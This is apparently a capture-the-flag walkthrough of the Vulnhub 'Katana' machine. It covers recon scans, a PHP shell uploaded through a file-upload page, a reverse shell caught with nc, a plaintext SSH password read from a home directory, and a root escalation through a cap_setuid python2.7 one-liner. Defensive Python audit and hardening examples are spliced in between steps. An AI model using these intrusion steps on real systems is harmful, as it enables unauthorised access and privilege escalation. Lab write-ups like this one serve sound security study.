Vulnhub: Katana machine, detailed walkthrough
Katana
Target machine information
Name: Katana
Address:
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:4d:1a:eb 1 60 PCS Systemtechnik GmbH
192.168.56.157 08:00:27:98:a8:02 1 60 PCS Systemtechnik GmbH
Kali Linux used the netdiscover tool to identify the target host's IP address as 192.168.56.157
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.157 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 05:01 EST
Nmap scan report for localhost (192.168.56.157)
Host is up (0.00032s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 894f3a5401f8dcb66ee078fc60a6de35 (RSA)
| 256 ddaccc4e43816be32df312a13e4ba322 (ECDSA)
|_ 256 cce625c0c6119f88f6c4261edefae98b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/http LiteSpeed httpd
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after: 2022-05-11T13:57:36
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_http-server-header: LiteSpeed
|_http-title: Katana X
|_ssl-date: TLS randomness does not represent time
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
MAC Address: 08:00:27:98:A8:02 (Oracle VirtualBox virtual NIC)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 9h40m00s, deviation: 2h53m12s, median: 7h59m59s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: katana
| NetBIOS computer name: KATANA\x00
| Domain name: \x00
| FQDN: katana
|_ System time: 2023-02-24T13:02:11-05:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-02-24T18:02:11
|_ start_date: N/A
|_nbstat: NetBIOS name: KATANA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.06 seconds
Getting a shell
Ports 139/445
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ smbclient -L 192.168.56.157
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KATANA
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ enum4linux 192.168.56.157
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Feb 24 05:04:02 2023
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\katana (Local User)
Username identified: katana
Port 21
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220 (vsFTPd 3.0.3)
Name (192.168.56.157:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ searchsploit vsFTPd 3.0.3
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
- The target host does not allow anonymous FTP access
- There is no exploitable vulnerability for this FTP version
Port 80
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ nikto -h http://192.168.56.157
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.157
+ Target Hostname: 192.168.56.157
+ Target Port: 80
+ Start Time: 2023-02-24 05:11:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 28f, size: 5a561ca401471, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-24 05:12:11 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,sh,txt,php,js
[+] Timeout: 10s
===============================================================
2023/02/24 05:12:54 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 655]
/ebook (Status: 301) [Size: 316] [--> http://192.168.56.157/ebook/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322373 / 1323366 (99.92%)===============================================================
2023/02/24 05:15:32 Finished
===============================================================
gobuster found the /ebook directory. Visiting it, the page has an admin login link, and no matter what is entered, the login succeeds.
http://192.168.56.157/ebook/controllers/
The /ebook/controllers/ directory contains DatabaseTalking/, which has 2 files:
Take.php
Talking.php
Visiting these files returns nothing at all, which is a bit odd.
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ curl http://192.168.56.157/ebook/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: nghi.lethanh2@cou.fi
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ gobuster dir -u http://192.168.56.157/ebook -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157/ebook
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,js,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/24 05:21:40 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/contact.php (Status: 200) [Size: 4155]
/index.php (Status: 200) [Size: 3998]
/books.php (Status: 200) [Size: 5164]
/info.php (Status: 200) [Size: 94940]
/admin.php (Status: 200) [Size: 3153]
/book.php (Status: 200) [Size: 10]
/cart.php (Status: 200) [Size: 2702]
/purchase.php (Status: 200) [Size: 2692]
/template (Status: 301) [Size: 325] [--> http://192.168.56.157/ebook/template/]
/edit.php (Status: 200) [Size: 16]
/database (Status: 301) [Size: 325] [--> http://192.168.56.157/ebook/database/]
/checkout.php (Status: 200) [Size: 2696]
/process.php (Status: 200) [Size: 2016]
/models (Status: 301) [Size: 323] [--> http://192.168.56.157/ebook/models/]
/functions (Status: 301) [Size: 326] [--> http://192.168.56.157/ebook/functions/]
/verify.php (Status: 200) [Size: 69]
/bootstrap (Status: 301) [Size: 326] [--> http://192.168.56.157/ebook/bootstrap/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/controllers (Status: 301) [Size: 328] [--> http://192.168.56.157/ebook/controllers/]
Progress: 1318803 / 1323366 (99.66%)===============================================================
2023/02/24 05:24:13 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ mv ~/Downloads/www_project.sql .
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ cat www_project.sql
-- phpMyAdmin SQL Dump
-- version 4.4.12
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Dec 05, 2015 at 05:57 PM
-- Server version: 5.6.25
-- PHP Version: 5.6.11
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `www_project`
--
-- --------------------------------------------------------
--
-- Table structure for table `admin`
--
CREATE TABLE IF NOT EXISTS `admin` (
`name` varchar(20) COLLATE latin1_general_ci NOT NULL,
`pass` varchar(40) COLLATE latin1_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;
--
-- Dumping data for table `admin`
--
INSERT INTO `admin` (`name`, `pass`) VALUES
('admin', 'd033e22ae348aeb5660fc2140aec35850c4da997');
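The `admin` row stores a bare 40-hex SHA-1 digest, and the readme above already documents the default login as admin / admin. As an added example (not code from the original post or from the ebook application), the Python below classifies the storage scheme from the shape of the stored value, checks whether the stored digest is simply the SHA-1 of the documented default password, and shows what a defender would replace it with: a per-user random salt and a memory-hard KDF (scrypt from the standard library) with constant-time verification. The sample row and the candidate list are constructed from the values on the page; the function names are my own.

```python
import hashlib
import hmac
import os
import re

# Constructed sample: the single row of the `admin` table from the www_project.sql dump above.
DUMP_ROWS = [("admin", "d033e22ae348aeb5660fc2140aec35850c4da997")]

# The default login documented in the application's readme.txt.txt (admin / admin).
DOCUMENTED_DEFAULTS = ["admin"]

UNSALTED_SHA1 = re.compile(r"^[0-9a-f]{40}$")


def classify_hash(stored):
    """Guess the storage scheme from the shape of the stored value."""
    if UNSALTED_SHA1.match(stored):
        return "unsalted-sha1"
    if stored.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if stored.startswith("$argon2"):
        return "argon2"
    if stored.startswith("scrypt$"):
        return "scrypt"
    return "unknown"


def matches_documented_default(stored, candidates=DOCUMENTED_DEFAULTS):
    """Return the documented default password whose plain SHA-1 equals the stored value, else None."""
    for pw in candidates:
        if hmac.compare_digest(hashlib.sha1(pw.encode()).hexdigest(), stored):
            return pw
    return None


def audit(rows):
    """One finding per row: scheme in use and whether it is just the documented default."""
    findings = []
    for user, stored in rows:
        scheme = classify_hash(stored)
        hit = matches_documented_default(stored) if scheme == "unsalted-sha1" else None
        findings.append({"user": user, "scheme": scheme, "default_password": hit})
    return findings


# Mitigation: per-user random salt plus a memory-hard KDF. scrypt ships with hashlib.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1)


def hash_password(password):
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time; rejects any other format."""
    try:
        scheme, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for finding in audit(DUMP_ROWS):
        print(finding)
    record = hash_password("admin")
    print(classify_hash(record), verify_password("admin", record))
```

Two identical passwords hash to different records because the salt is random, so a leaked dump no longer lets a reviewer (or anyone else) confirm a default credential by recognising a single well-known digest; the remaining fix is to change the documented admin / admin login itself.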
Port 8088
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.157:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/02/24 06:09:58 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 655]
/cgi-bin (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/docs/]
/upload.html (Status: 200) [Size: 6480]
/upload.php (Status: 200) [Size: 1800]
/css (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://192.168.56.157:8088/blocked/]
/upload.html allows uploading files
/tmp/phpV0tJ0S ====> /opt/manager/html/katana_shell.php
http://192.168.56.157:8715/katana_shell.php
The uploaded file lands in the web root served on port 8715, and the file name has been changed (but why port 8715? I don't understand)
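The upload handler on 8088 accepted a .php file and wrote it into a directory that a second web server (nginx on 8715) serves, which is exactly the combination an upload endpoint has to rule out. As an added example, not part of the original post and not the machine's own upload.php, the Python below shows the checks a hardened handler applies before writing anything: strip any client-supplied path, allowlist the extension, reject inner executable extensions (shell.php.png), confirm the content's magic bytes match the claimed type, and store under a random server-chosen name. The function name, the allowlist and the sample inputs (including the katana_shell.php name from the page) are constructed for illustration.

```python
import os
import secrets

# Allowed upload types and the leading bytes a genuine file of that type must carry.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}

# Extensions that some server configurations hand to an interpreter wherever they appear in a name.
EXECUTABLE_EXTENSIONS = {
    "php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps",
    "sh", "cgi", "pl", "py",
}


def check_upload(client_filename, head):
    """Validate one upload.

    client_filename: the name the browser sent (untrusted).
    head: the first bytes of the uploaded content (at least 8).
    Returns (True, storage_name) or (False, reason).
    """
    # Drop any client-supplied path so ../ and backslash tricks cannot steer the write.
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing or empty extension"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    # shell.php.png: reject any executable extension hiding before the last one.
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:-1]):
        return False, "double extension"
    if not head.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # Never reuse the client's name; a random one also stops guessing the stored path.
    return True, secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed samples: the name from the page plus a few edge cases.
    for name, head in [
        ("katana_shell.php", b"<?php echo 1;"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("fake.png", b"<?php echo 1;"),
        ("../../cover.png", b"\x89PNG\r\n\x1a\n\x00"),
    ]:
        print(name, "->", check_upload(name, head))
```

The name validation only matters if the storage directory itself is outside every document root that any of the machine's web servers (Apache, LiteSpeed, nginx) map; here the file landed under /opt/manager/html, which 8715 serves, so even a well-validated name would have been reachable as a URL.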
┌──(kali㉿kali)-[~/Vulnhub/katana]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.157] 56370
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
14:15:15 up 1:15, 0 users, load average: 0.00, 0.03, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@katana:/$
www-data@katana:/home/katana$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 katana katana 4.0K May 11 2020 .
drwxr-xr-x 3 root root 4.0K May 11 2020 ..
-rw-r--r-- 1 katana katana 220 May 11 2020 .bash_logout
-rw-r--r-- 1 katana katana 3.5K May 11 2020 .bashrc
drwx------ 3 katana katana 4.0K May 11 2020 .gnupg
-rw-r--r-- 1 katana katana 807 May 11 2020 .profile
-rw-r--r-- 1 root root 19 May 11 2020 .ssh_passwd
www-data@katana:/home/katana$ cat .ssh_passwd
cat .ssh_passwd
katana@katana12345
www-data@katana:/home/katana$ su - katana
su - katana
Password: katana12345
katana@katana:~$
Privilege escalation
Upload the linpeas.sh script to the target host's /tmp directory, change its permissions, and run it:
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
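linpeas flags cap_setuid on /usr/bin/python2.7: a file capability that lets anyone able to run the interpreter switch to uid 0, so it is a finding to fix, not to live with. As an added example (not code from the post, and not linpeas), here is a small Python audit that parses `getcap -r /` style output, accepting both the older `path = caps+ep` layout shown above and the newer `path caps=ep` layout, and flags dangerous capabilities, rating them critical when they sit on an interpreter or shell. The sample lines are the two from the page; the capability lists and function names are my own choices.

```python
import re

# Capabilities that on their own let a process step outside the caller's privilege boundary.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Interpreters and shells: a dangerous capability here is usable by every user who can execute them.
INTERPRETERS = re.compile(
    r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|php[\d.]*|node|lua[\d.]*|bash|dash|sh)$"
)

# Constructed sample: the two lines linpeas printed on this machine.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
"""


def parse_caps(capstr):
    """Return the capability names in a libcap text form such as 'cap_setuid+ep'
    or 'cap_net_raw,cap_net_admin=ep'; the flag letters after +/= are ignored."""
    names = re.split(r"[+=]", capstr, maxsplit=1)[0]
    return {c.strip() for c in names.split(",") if c.strip()}


def parse_getcap(text):
    """Parse getcap output into (path, set_of_caps) pairs for both output layouts."""
    entries = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw or "cap_" not in raw:
            continue
        if " = " in raw:
            path, _, capstr = raw.partition(" = ")
        else:
            path, _, capstr = raw.partition(" ")
        entries.append((path.strip(), parse_caps(capstr.strip())))
    return entries


def audit_caps(text):
    """Return one finding per binary that carries a dangerous capability."""
    findings = []
    for path, caps in parse_getcap(text):
        risky = caps & DANGEROUS
        if not risky:
            continue
        severity = "critical" if INTERPRETERS.search(path) else "review"
        findings.append({"path": path, "caps": sorted(risky), "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in audit_caps(SAMPLE_GETCAP):
        print(f"{finding['severity']:8} {finding['path']}  {','.join(finding['caps'])}")
```

Run against real output (`getcap -r / 2>/dev/null`) from a cron job or a configuration-management check, the critical finding here is remediated with `setcap -r /usr/bin/python2.7`; ping's cap_net_raw is the normal, expected case and is deliberately not reported.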
katana@katana:/tmp$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
< -c 'import os; os.setuid(0); os.system("/bin/sh")'
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------ 4 root root 4.0K May 11 2020 .
drwxr-xr-x 18 root root 4.0K May 11 2020 ..
-rw------- 1 root root 563 May 11 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K May 11 2020 .gnupg
drwxr-xr-x 3 root root 4.0K May 11 2020 .local
-rw------- 1 root root 155 May 11 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 22 May 11 2020 root.txt
-rw-r--r-- 1 root root 66 May 11 2020 .selected_editor
-rw-r--r-- 1 root root 209 May 11 2020 .wget-hsts
# cat root.txt
cat root.txt
{R00t_key_Katana_91!}
STRIVE FOR PROGRESS, NOT FOR PERFECTION